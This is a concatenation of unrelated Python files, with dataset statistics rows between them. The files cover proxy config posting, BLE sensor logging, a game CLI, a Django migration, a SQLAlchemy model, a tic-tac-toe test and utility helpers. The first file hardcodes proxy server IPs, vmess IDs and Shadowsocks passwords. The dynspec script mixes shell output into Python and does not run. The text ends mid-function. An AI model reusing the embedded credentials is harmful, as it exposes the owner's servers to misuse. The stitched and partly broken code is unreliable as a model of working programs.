# @Time : 2020/3/3 0003 1:02
# @Author : Gpp
# @File : send_data.py
import requests
data = {"local": "beijing"}
proxy_data = {'proxy_data': [
{"v": "2",
"ps": "BWG-LA",
"add": "65.49.212.111",
"port": "62860",
"proxy_id": "523f96fd-a480-4b13-919e-ddd54dee3d71",
"aid": "233",
"net": "tcp",
"type": "none",
"host": "",
"path": "",
"tls": "",
"proxy_type": "vmess",
"is_share": True,
},
{"v": "2",
"ps": "GCP-TW",
"add": "34.80.52.191",
"port": "45461",
"proxy_id": "ec6a267e-987d-44a8-aff5-fd646e9b6d87",
"aid": "233",
"net": "tcp",
"type": "none",
"host": "",
"path": "",
"tls": "",
"proxy_type": "vmess",
"is_share": True,
},
{
"add": "34.80.60.73",
"port": "35535",
"secret": "aes-256-cfb",
"password": "t14RB2u6D5dA",
"alias": "GWP-Taiwan",
"proxy_type": "ss",
"is_share": True,
},
{
"add": "65.49.212.111",
"port": "18344",
"secret": "aes-256-cfr",
"password": "6D#gpFucT$8a",
"alias": "BWG-LA",
"proxy_type": "ss",
"is_share": True,
}]}
proxy_data2 = {'proxy_data': [{"aid": "sds", "proxy_type": "vmess", "port": "2344475", "add": "34.56.767.397"},
{"add": '45345.6778', "proxy_type": "ss", "port": "237443"}]}
proxy_data3 = {"type": "vmess", "data": [{"port": "234445", "add": "34.56.767.39"}, {"type": "hht", "aid": "sds_"}]}
# a = requests.get('http://127.0.0.1:196/proxy', json=proxy_data)
# print(a.json())
j = requests.post('http://127.0.0.1:196/proxy', json=proxy_data)
# print(type(a.json()), a.json())
# k = requests.put('http://127.0.0.1:196/proxy', json=proxy_data3)
# print(k.status_code)
# d = requests.delete('http://127.0.0.1:196/proxy', json=proxy_data2)
# a = requests.get('http://127.0.0.1:196/generate')
# print(a.json())
| 27.108108 | 116 | 0.491525 | 261 | 2,006 | 3.685824 | 0.440613 | 0.056133 | 0.04158 | 0.046778 | 0.366944 | 0.366944 | 0.285863 | 0.285863 | 0.285863 | 0.191268 | 0 | 0.148711 | 0.245763 | 2,006 | 73 | 117 | 27.479452 | 0.487112 | 0.222333 | 0 | 0.45283 | 0 | 0 | 0.417853 | 0.046572 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.037736 | 0.018868 | 0 | 0.018868 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e9b8ea7e2bd07dc4d06872cc020b7b5cecd74b2 | 811 | py | Python | scripts/protocol/ibp/exceptions.py | periscope-ps/unis | b43b66f84fe91218d23c79dbf9e20fcec870ce74 | [
"BSD-3-Clause"
] | 2 | 2015-06-27T14:41:39.000Z | 2017-05-18T18:33:02.000Z | scripts/protocol/ibp/exceptions.py | periscope-ps/unis | b43b66f84fe91218d23c79dbf9e20fcec870ce74 | [
"BSD-3-Clause"
] | 18 | 2015-12-16T21:42:09.000Z | 2021-09-29T15:55:39.000Z | scripts/protocol/ibp/exceptions.py | periscope-ps/unis | b43b66f84fe91218d23c79dbf9e20fcec870ce74 | [
"BSD-3-Clause"
] | 2 | 2017-09-01T15:35:21.000Z | 2019-07-19T02:57:05.000Z | # =============================================================================
# periscope-ps (unis)
#
# Copyright (c) 2012-2016, Trustees of Indiana University,
# All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD
# license. See the COPYING file for details.
#
# This software was created at the Indiana University Center for Research in
# Extreme Scale Technologies (CREST).
# =============================================================================
from ..exceptions import AllocationException
class IBPException(AllocationException):
''' Generic exception for IBP related errors '''
def __init__(self, *args, **kwargs):
self.ibpResponse = kwargs.pop("response", None)
super(IBPException, self).__init__(*args, **kwargs)
| 38.619048 | 79 | 0.583231 | 80 | 811 | 5.8125 | 0.775 | 0.073118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011594 | 0.149199 | 811 | 20 | 80 | 40.55 | 0.662319 | 0.654747 | 0 | 0 | 0 | 0 | 0.030534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e9c3754b5c7a769bcc1a2383a850d736f933e82 | 6,016 | py | Python | BLE_Notifications.py | JyriLehtinen/Bluetooth | 84a80bbad0a1b2c11185e45e04a8f75a59b86644 | [
"MIT"
] | null | null | null | BLE_Notifications.py | JyriLehtinen/Bluetooth | 84a80bbad0a1b2c11185e45e04a8f75a59b86644 | [
"MIT"
] | null | null | null | BLE_Notifications.py | JyriLehtinen/Bluetooth | 84a80bbad0a1b2c11185e45e04a8f75a59b86644 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#This code scans for BLE advertising and decodes sensor data from a certain type of sensor module prototype
import sys
from bluepy.btle import Scanner, DefaultDelegate, Peripheral, BTLEException, Service, Characteristic
import os
import time
class SensorDelegate(DefaultDelegate):
message = 0
def __init__(self):
DefaultDelegate.__init__(self)
def handleNotification(self, cHandle, data):
self.message = data
def readNotification(self):
return self.message
class SensorModule:
def __init__(self, name, MAC, sensors):
self.name = name
self.MAC = MAC
#Describes what sensors are mounted on the unit using a 4B bitfield
self.sensors = sensors
def StartScan(duration):
scanner = Scanner().withDelegate(SensorDelegate())
devices = scanner.scan(duration)
for dev in devices:
if(dev.getValueText(0xFF)):
if("4e4f4b" in dev.getValueText(0xFF)):
#This means "NOK" was found in the advertising packet
sensor_array = bytearray.fromhex(dev.getValueText(0xFF))
#Populate the sensor bitfield according to the advertising packet
sensors_mounted = int(sensor_array[7])
sensors_mounted += int(sensor_array[8] << 8)
sensors_mounted += int(sensor_array[9] << 16)
sensors_mounted += int(sensor_array[10] << 24)
target = SensorModule(dev.getValueText(0x09), dev.addr, sensors_mounted)
print "Battery module found, name = %s MAC: %s, sensors %d" % (target.name, target.MAC, target.sensors)
return target
#Changes the number of samples collected before transmitting them (default: 60) by writing 'B' followed by uint16_t in Little Endian
#Write is done to the configuration characteristic (Handle 0x15)
def SetTxLen(peripheral, tx_len):
command = bytearray([0x42, 0x00, 0x00])
command[1] = tx_len & 0x00FF
command[2] = (tx_len & 0xFF00) >> 8
peripheral.writeCharacteristic(0x15, command)
#This function changes the time between two samples (default: 1) by writing 'I' followed by uint16_t in Little Endian
def SetSampleInterval(peripheral, interval):
command = bytearray([0x49, 00, 00])
command[1] = interval & 0x00FF
command[2] = (interval & 0xFF00) >> 8
peripheral.writeCharacteristic(0x15, command)
#This function populates the instance with GATT services and characteristics
def discoverCharacteristics(peripheral):
for service in peripheral.getServices():
print service
service.getCharacteristics()
#Enable notifications in the data_stream characteristics by writing 0x01 to the descriptor (Handle 0x0F)
def enableNotification(peripheral):
peripheral.writeCharacteristic(0x0F, '\x01')
#Disable the data_stream notifications
def disableNotification(peripheral):
peripheral.writeCharacteristic(0x0F, '\x00')
#Receive and save the data streamed by the sensor module
def loopNotifications(peripheral, name, sensors):
myString = ""
time = os.popen("date")
for c in time.readlines():
myString += c
myString = myString.rstrip()
myFile.write(myString + '\n')
myFile.write("Module name: %s\n" % (name)) #Write the current date and time, along with the module name we're connected to
i = 0
while (peripheral.waitForNotifications(0.5)): #Keep looping until the wait times out (transmission over)
notification = peripheral.delegate.readNotification()
print notification.encode("hex")
myFile.write(decodeData(notification.encode("hex"), sensors) + '\n')
i += 1
myFile.flush()
#Decode the data streamed over BLE accordingly. How to interpret the data depends on the sensors mounted
def decodeData(hexline, sensors_mounted):
returnString = ""
hex_array = bytearray.fromhex(hexline)
seconds = int(hex_array[0] + (hex_array[1] << 8) + (hex_array[2] << 16) + (hex_array[3] << 24))
returnString = "Time: %d\t" % (seconds)
if(sensors_mounted & 0x01):
temperature = float(hex_array[4] + (hex_array[5] << 8))
returnString += "Temperature: %.1f\t" % (temperature/10.0)
if(sensors_mounted & 0x02):
humidity = float(hex_array[6] + (hex_array[7] << 8))
returnString += "Humidity: %.1f%%\t" % (humidity/10.0)
if(sensors_mounted & 0x0100):
voltage = int(hex_array[4] + (hex_array[5] << 8))
returnString += "Voltage: %d\t" % (voltage)
if(sensors_mounted & 0x0400):
temperature = float((hex_array[6] & 0x7F))
if(hex_array[7] & 0x80):
temperature += 0.5
returnString += "Temp: %.1f" % (temperature)
#print "Time: %d\tVoltage: %d\tTemp: %.1f" % (seconds, voltage, temperature)
return returnString
def adjustConfigurations(slave, sensors):
if(sensors & 0x03):
SetTxLen(slave, 30)
SetSampleInterval(slave, 10)
elif(sensors & 0x0500):
SetTxLen(slave, 240)
SetSampleInterval(slave, 1)
def main():
global myFile
myFile = open("SensorData_Streamed.txt", "a" )
while(1):
print "Scanning for Sensor Modules."
target = StartScan(3)
while (target is None):
sys.stdout.write('.')
sys.stdout.flush()
target = StartScan(3)
print "Target found, proceeding to connect!"
try:
#slave = Peripheral(target.MAC, "random")
slave = Peripheral(target.MAC, "public")
slave.setDelegate(SensorDelegate())
except BTLEException, e:
print "Connection failed!"
print e.code
print e.message
time.sleep(3)
continue
discoverCharacteristics(slave)
enableNotification(slave)
loopNotifications(slave, target.name, target.sensors)
adjustConfigurations(slave, target.sensors)
slave.disconnect()
print "Disconnected"
main()
| 35.809524 | 132 | 0.654255 | 692 | 6,016 | 5.618497 | 0.351156 | 0.026749 | 0.01749 | 0.023663 | 0.100823 | 0.062243 | 0.062243 | 0.046296 | 0 | 0 | 0 | 0.03523 | 0.240359 | 6,016 | 167 | 133 | 36.023952 | 0.815536 | 0.205785 | 0 | 0.033898 | 0 | 0 | 0.061122 | 0.004831 | 0 | 0 | 0.023104 | 0 | 0 | 0 | null | null | 0 | 0.033898 | null | null | 0.076271 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ea31eea2339507561fd448651449932198e0fd2 | 6,153 | py | Python | dev/Gems/CloudGemPlayerAccount/AWS/resource-manager-code/command.py | brianherrera/lumberyard | f85344403c1c2e77ec8c75deb2c116e97b713217 | [
"AML"
] | 1,738 | 2017-09-21T10:59:12.000Z | 2022-03-31T21:05:46.000Z | dev/Gems/CloudGemPlayerAccount/AWS/resource-manager-code/command.py | ArchitectureStudios/lumberyard | f85344403c1c2e77ec8c75deb2c116e97b713217 | [
"AML"
] | 427 | 2017-09-29T22:54:36.000Z | 2022-02-15T19:26:50.000Z | dev/Gems/CloudGemPlayerAccount/AWS/resource-manager-code/command.py | ArchitectureStudios/lumberyard | f85344403c1c2e77ec8c75deb2c116e97b713217 | [
"AML"
] | 671 | 2017-09-21T08:04:01.000Z | 2022-03-29T14:30:07.000Z | #
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# $Revision: #1 $
import resource_manager.cli
import pa_service_api
def add_cli_commands(hook, subparsers, add_common_args, **kwargs):
subparser = subparsers.add_parser("player-account", help="Commands to manage the CloudGemPlayerAccount gem")
subparser.register('action', 'parsers', resource_manager.cli.AliasedSubParsersAction)
player_account_subparsers = subparser.add_subparsers(dest='subparser_name', metavar='COMMAND')
subparser = player_account_subparsers.add_parser('add-player', help='Add a new player')
subparser.add_argument('--username', type=str, required=True, help='The cognito username of the account to create')
subparser.add_argument('--email', type=str, required=True, help='The email address for the player')
subparser.add_argument('--playername', type=str, required=False, help='The name of the player in the game.')
subparser.add_argument('--givenname', type=str, required=False, help='The players given name,')
subparser.add_argument('--familyname', type=str, required=False, help='The players family name,')
subparser.add_argument('--nickname', type=str, required=False, help='The players nickname')
subparser.add_argument('--gender', type=str, required=False, choices=pa_service_api.GENDER_CHOICES, help='The players gender')
subparser.add_argument('--locale', type=str, required=False, help='The players locale')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_add_player)
subparser = player_account_subparsers.add_parser('ban-player', help='Ban a player. See remove_player_ban to restore player')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to ban')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_ban_player)
subparser = player_account_subparsers.add_parser('confirm-player', help='Force confirm a player')
subparser.add_argument('--username', type=str, required=True, help='The cognito username of the account to confirm')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_confirm_player)
subparser = player_account_subparsers.add_parser('edit-player', help='Edit a players settings')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to edit')
subparser.add_argument('--playername', type=str, required=False, help='The name of the player in the game.')
subparser.add_argument('--givenname', type=str, required=False, help='The players given name,')
subparser.add_argument('--familyname', type=str, required=False, help='The players family name,')
subparser.add_argument('--nickname', type=str, required=False, help='The players nickname,')
subparser.add_argument('--gender', type=str, required=False, choices=pa_service_api.GENDER_CHOICES, help='The players gender')
subparser.add_argument('--locale', type=str, required=False, help='The players locale')
subparser.add_argument('--email', type=str, required=False, help='The email address for the player')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_edit_player)
subparser = player_account_subparsers.add_parser('remove-player-ban', help='Remove a player ban')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to restore')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_remove_player_ban)
subparser = player_account_subparsers.add_parser('reset-player-password', help='Reset a player password')
subparser.add_argument('--username', type=str, required=True, help='The cognito username of the account to target')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_reset_player_password)
subparser = player_account_subparsers.add_parser('show-banned-players', help='List banned players in the Gem')
subparser.add_argument('--page-token', type=str, required=False, default=None, help='The pagination token to get the next page.')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_list_banned_players)
subparser = player_account_subparsers.add_parser('show-players', help='List registered players in the Gem')
subparser.add_argument('--filter-type', type=str, required=False, choices=pa_service_api.SEARCH_FILTER_CHOICES, help='The type of filter to apply')
subparser.add_argument('--filter-value', type=str, required=False, help='The value for the filter as a string. '
'For example the email address for the CognitoEmail filter.')
subparser.add_argument('--page-token', type=str, required=False, default=None, help='The pagination token to get the next page.')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_list_players)
subparser = player_account_subparsers.add_parser('show-player-details', help='Show details about a player')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to show details for')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_list_player_details)
subparser = player_account_subparsers.add_parser('show-logs', help='Show recent log events for ServiceLambda')
subparser.add_argument('--minutes', type=int, required=False, help='How far back from now to attempt to display. Default is 10mins')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_show_log_events)
| 69.920455 | 151 | 0.759142 | 855 | 6,153 | 5.281871 | 0.187135 | 0.071745 | 0.115146 | 0.075288 | 0.680027 | 0.674934 | 0.648804 | 0.54473 | 0.513065 | 0.513065 | 0 | 0.00056 | 0.12888 | 6,153 | 87 | 152 | 70.724138 | 0.841791 | 0.084187 | 0 | 0.349206 | 0 | 0 | 0.293008 | 0.007472 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.031746 | 0.031746 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ea65fbf958336b9e959399af4a9e0239eaa9b41 | 610 | py | Python | tests/migrations/0014_auto_20200327_1152.py | intellineers/django-bridger | ed097984a99df7da40a4d01bd00c56e3c6083056 | [
"BSD-3-Clause"
] | 2 | 2020-03-17T00:53:23.000Z | 2020-07-16T07:00:33.000Z | tests/migrations/0014_auto_20200327_1152.py | intellineers/django-bridger | ed097984a99df7da40a4d01bd00c56e3c6083056 | [
"BSD-3-Clause"
] | 76 | 2019-12-05T01:15:57.000Z | 2021-09-07T16:47:27.000Z | tests/migrations/0014_auto_20200327_1152.py | intellineers/django-bridger | ed097984a99df7da40a4d01bd00c56e3c6083056 | [
"BSD-3-Clause"
] | 1 | 2020-02-05T15:09:47.000Z | 2020-02-05T15:09:47.000Z | # Generated by Django 2.2.11 on 2020-03-27 10:52
import django_fsm
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("tests", "0013_auto_20200219_1324"),
]
operations = [
migrations.AlterField(
model_name="modeltest",
name="status_field",
field=django_fsm.FSMField(
choices=[("status1", "Status1"), ("status2", "Status2"), ("status3", "Status3"),],
default="status1",
max_length=50,
verbose_name="Status",
),
),
]
| 25.416667 | 98 | 0.545902 | 58 | 610 | 5.586207 | 0.706897 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099274 | 0.322951 | 610 | 23 | 99 | 26.521739 | 0.68523 | 0.07541 | 0 | 0.111111 | 1 | 0 | 0.185053 | 0.040925 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ecd3bb7ab30b57db2889871b443e252e1a7b759 | 979 | py | Python | PyScraper/server/models/project.py | nikan1996/PyScraper | ed6ba5aa490fce96b5ff59e1461b408886744c04 | [
"Apache-2.0"
] | null | null | null | PyScraper/server/models/project.py | nikan1996/PyScraper | ed6ba5aa490fce96b5ff59e1461b408886744c04 | [
"Apache-2.0"
] | 1 | 2018-05-31T19:08:40.000Z | 2018-05-31T19:08:40.000Z | PyScraper/server/models/project.py | nikan1996/PyScraper | ed6ba5aa490fce96b5ff59e1461b408886744c04 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
@author:nikan
@file: project.py
@time: 2018/5/14 下午4:20
"""
import datetime
from sqlalchemy import text
from sqlalchemy.dialects import mysql
from PyScraper.server.extensions import db
class Project(db.Model):
__tablename__ = "project"
project_id = db.Column(db.Integer, autoincrement=True, primary_key=True, doc="自增id")
project_name = db.Column(db.String(191), nullable=False, doc="项目名称")
setting = db.Column(mysql.JSON, doc="项目配置")
cron_config = db.Column(mysql.JSON, doc="项目调度配置")
tag = db.Column(db.String(191), doc="项目标签")
status = db.Column(db.String(191), nullable=False, default='stop', doc="项目状态")
is_deleted = db.Column(db.Boolean, default=0, doc="项目是否删除的标记")
update_timestamp = db.Column(db.TIMESTAMP, server_default=text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), doc="更新时间")
create_timestamp = db.Column(db.TIMESTAMP, default=datetime.datetime.now, doc="创建时间")
| 29.666667 | 128 | 0.716037 | 139 | 979 | 4.942446 | 0.517986 | 0.104803 | 0.101892 | 0.069869 | 0.260553 | 0.093159 | 0.093159 | 0 | 0 | 0 | 0 | 0.024823 | 0.135853 | 979 | 32 | 129 | 30.59375 | 0.787234 | 0.096016 | 0 | 0 | 0 | 0 | 0.113272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.266667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ecf4658030d2902120f78e893a4f7cec04a779d | 1,935 | py | Python | refresh_dynspec_files.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | 2 | 2019-05-01T00:34:28.000Z | 2021-02-10T09:18:10.000Z | refresh_dynspec_files.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null | refresh_dynspec_files.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null | '''
refresh_dynspec_files.py
Purpose: Re-run the step of going from tbavg.ms to tbavg.ms.dynspec for all observations. This is
useful because I found a bug in dyn_spec (which reads the dynspec out of tbavg.ms) and so
want to redo just this step.
'''
import dynspec.ms2dynspec
reload(dynspec.ms2dynspec)
from dynspec.pipeline_utils import load_ds_filelist
from dynspec.ms2dynspec import tbavg2dsfile
ds_filelist = load_ds_filelist()
failed_list = []
for obs in ds_filelist:
obs_filelist = ds_filelist[obs]
for ds_file in obs_filelist:
tbavg_ms_file = ds_file[:-8]
if os.path.exists(tbavg_ms_file):
ds_file = tbavg2dsfile(tbavg_ms_file)
else:
print tbavg_ms_file, 'does not exist'
failed_list.append(tbavg_ms_file)
print 'Failed list:'
print failed_list
# failed on VLBA data (except for UVCet_3X...no it wasn't in ds_filelist) --> need to do those separately
# (although they shouldn't have much flagging so it shouldn't be as much of an issue)
# to do: find code used to create VLBA dynspecs in the first place
# find VLBA dynspecs
# write script to recreate VLBA dynspecs
ls -d /data/jrv/BV071/*/*/*tbavg.ms*
/data/jrv/BV071/ADLeo/3/ADLeo_3X.tbavg.ms /data/jrv/BV071/UVCet/3/UVCet_3X.tbavg.ms
/data/jrv/BV071/ADLeo/3/ADLeo_3X.tbavg.ms.dynspec /data/jrv/BV071/UVCet/3/UVCet_3X.tbavg.ms.dynspec
/data/jrv/BV071/ADLeo/4/ADLeo_4X.tbavg.ms /data/jrv/BV071/UVCet/4/UVCet_4X.tbavg.ms
/data/jrv/BV071/ADLeo/4/ADLeo_4X.tbavg.ms.dynspec /data/jrv/BV071/UVCet/4/UVCet_4X.tbavg.ms.dynspec
/data/jrv/BV071/ADLeo/5/ADLeo_5X.tbavg.ms /data/jrv/BV071/UVCet/5/UVCet_5X.tbavg.ms
/data/jrv/BV071/ADLeo/5/ADLeo_5X.tbavg.ms.dynspec /data/jrv/BV071/UVCet/5/UVCet_5X.tbavg.ms.dynspec
# Conclusion: I want to use selfcal'd versions of the data sets for dynspecs anyways, so don't worry about re-creating these dynspecs for the moment.
| 43.977273 | 149 | 0.737468 | 336 | 1,935 | 4.119048 | 0.348214 | 0.106214 | 0.112717 | 0.070809 | 0.33237 | 0.307803 | 0.307803 | 0.282514 | 0.282514 | 0.056358 | 0 | 0.043103 | 0.160724 | 1,935 | 43 | 150 | 45 | 0.809113 | 0.236693 | 0 | 0 | 0 | 0 | 0.021649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ee361e0cf18f478933ff52e050ff7fb2712439d | 823 | py | Python | model/test_game.py | AndreasHae/tictactoe-py | 7c6d67474793a9f19f5797eaa8386e4b2c2eebf3 | [
"MIT"
] | 1 | 2018-03-18T22:51:29.000Z | 2018-03-18T22:51:29.000Z | model/test_game.py | AndreasHae/tictactoe-py | 7c6d67474793a9f19f5797eaa8386e4b2c2eebf3 | [
"MIT"
] | 2 | 2018-03-18T22:58:03.000Z | 2018-03-19T10:39:33.000Z | model/test_game.py | AndreasHae/tictactoe-py | 7c6d67474793a9f19f5797eaa8386e4b2c2eebf3 | [
"MIT"
] | null | null | null | import unittest
from model.game import Game
class GameTest(unittest.TestCase):
    """Unit tests for the tic-tac-toe Game model."""

    def setUp(self):
        # A fresh game for every test so no state leaks between cases.
        self.game = Game()

    def test_next_player(self):
        """Players must alternate strictly turn by turn."""
        player_a = self.game.next_player
        self.game.turn(0, 0)
        player_b = self.game.next_player
        self.game.turn(1, 0)
        self.assertEqual(player_a, self.game.next_player)
        self.game.turn(0, 1)
        self.assertEqual(player_b, self.game.next_player)

    def test_turn_input_checked(self):
        """Coordinates outside the 3x3 board are rejected."""
        for row, col in ((-1, -1), (3, 3)):
            with self.assertRaises(AssertionError):
                self.game.turn(row, col)

    def test_turn_cell_occupied(self):
        """Playing an already occupied cell is rejected."""
        self.game.turn(0, 0)
        with self.assertRaises(AssertionError):
            self.game.turn(0, 0)
| 25.71875 | 62 | 0.64277 | 109 | 823 | 4.706422 | 0.256881 | 0.187135 | 0.191033 | 0.140351 | 0.606238 | 0.573099 | 0.502924 | 0.233918 | 0.163743 | 0.163743 | 0 | 0.02269 | 0.250304 | 823 | 31 | 63 | 26.548387 | 0.808752 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42bf541386207b87a028f4682fdc2f2b583c0fb0 | 8,805 | py | Python | Util.py | a523/obscmdbench | 109f83d42f7e266d6205bac3f13c210502ed86f4 | [
"Apache-2.0"
] | 27 | 2018-01-23T09:23:03.000Z | 2021-08-09T19:01:42.000Z | Util.py | a523/obscmdbench | 109f83d42f7e266d6205bac3f13c210502ed86f4 | [
"Apache-2.0"
] | 3 | 2019-06-23T07:30:21.000Z | 2020-08-04T08:58:19.000Z | Util.py | a523/obscmdbench | 109f83d42f7e266d6205bac3f13c210502ed86f4 | [
"Apache-2.0"
] | 8 | 2018-09-20T10:08:39.000Z | 2021-09-14T07:33:37.000Z | # -*- coding:utf-8 -*-
import random
import string
import base64
import hmac
import hashlib
import logging
import sys
import time
import os
TIME_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
ISO8601 = '%Y%m%dT%H%M%SZ'
ISO8601_MS = '%Y-%m-%dT%H:%M:%S.%fZ'
RFC1123 = '%a, %d %b %Y %H:%M:%S %Z'
class InitSSHRemoteHost:
    """Connection parameters for one remote benchmark host.

    Plain value object: other modules read the attributes directly, so
    the attribute names (including ``localIP``) must not change.
    """

    def __init__(self, ip, username, password, tools_path, tool_number):
        # Store everything verbatim; no validation is performed here.
        self.tool_number = tool_number
        self.tools_path = tools_path
        self.password = password
        self.username = username
        self.localIP = ip
def random_string_create(string_length):
    """Return a random string of *string_length* characters.

    The alphabet is ASCII letters, digits, and punctuation with a
    handful of shell-hostile punctuation characters removed.

    NOTE(review): Python 2 only code — it uses the print statement and
    the Python 2 form of str.translate(None, deletechars), where a None
    table means "delete the listed characters".  On a non-int input it
    prints 'input error' and implicitly returns None instead of raising.
    """
    if isinstance(string_length, int):
        return ''.join(
            [random.choice(string.ascii_letters + string.digits + string.punctuation.translate(None, '!,%&<>\'\\^`')) for n in
             range(string_length)])
    else:
        print 'input error'
def generate_image_format(image_format):
    """Pick the image transcoding format to use.

    *image_format* may be a single format name, or several names joined
    by commas, in which case one of them is chosen at random.

    :param image_format: format name or comma-separated list of names
    :return: the chosen format string
    """
    if ',' not in str(image_format):
        return image_format
    candidates = image_format.split(',')
    return candidates[random.randint(0, len(candidates) - 1)]
def generate_a_size(data_size_str):
    """Resolve an object-size specification to a concrete value.

    Returns ``(size, is_fixed)``; ``is_fixed`` is True only for a plain
    fixed value, which lets callers cache it instead of re-resolving.

    Accepted forms: ``'N'`` (fixed), ``'A~B'`` (random within range),
    ``'N1,N2,...'`` (random pick), and ``'A~B,C~D,...'`` (random pick of
    a range, then a random value inside it).
    """
    spec = str(data_size_str)
    has_range = spec.find('~') != -1
    has_choices = spec.find(',') != -1
    if has_range and has_choices:
        choices = data_size_str.split(',')
        chosen = choices[random.randint(0, len(choices) - 1)]
        bounds = chosen.split('~')
        return random.randint(int(bounds[0]), int(bounds[1])), False
    if has_range:
        bounds = data_size_str.split('~')
        return random.randint(int(bounds[0]), int(bounds[1])), False
    if has_choices:
        choices = data_size_str.split(',')
        return int(choices[random.randint(0, len(choices) - 1)]), False
    return int(data_size_str), True
def get_utf8_value(value):
    """Coerce *value* to a UTF-8 encoded byte string (Python 2 semantics).

    NOTE(review): this references the Python 2 only ``unicode`` builtin;
    on Python 3 that branch would raise NameError at runtime.
    """
    if not value:
        # Any falsy value (None, '', 0, ...) collapses to the empty string.
        return ''
    if isinstance(value, str):
        return value
    if isinstance(value, unicode):
        # Python 2: encode a unicode object down to a UTF-8 byte string.
        return value.encode('utf-8')
    # Fall back to the textual representation of any other type.
    return str(value)
def compare_version(v1, v2):
    """Compare two dotted version strings component by component.

    :param v1: first version string, e.g. '1.2.3'
    :param v2: second version string
    :return: 1 if v1 > v2, -1 if v1 < v2 (or if a component of either
